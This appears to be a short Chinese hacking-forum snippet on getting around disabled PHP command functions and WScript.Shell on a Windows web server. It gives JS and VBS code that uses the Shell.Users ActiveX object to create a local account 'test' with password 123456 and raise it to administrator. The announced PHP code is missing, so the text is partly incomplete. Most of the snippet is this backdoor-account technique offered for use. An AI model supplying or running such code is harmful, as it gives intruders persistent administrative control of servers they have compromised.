当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
js:
var o=new ActiveXObject( Shell.Users );
z=o.create(test) ;
z.changePassword(123456,)
z.setting(AccountType)=3;
vbs:
Set o=CreateObject( Shell.Users )
Set z=o.create(test)
z.changePassword 123456,
z.setting(AccountType)=3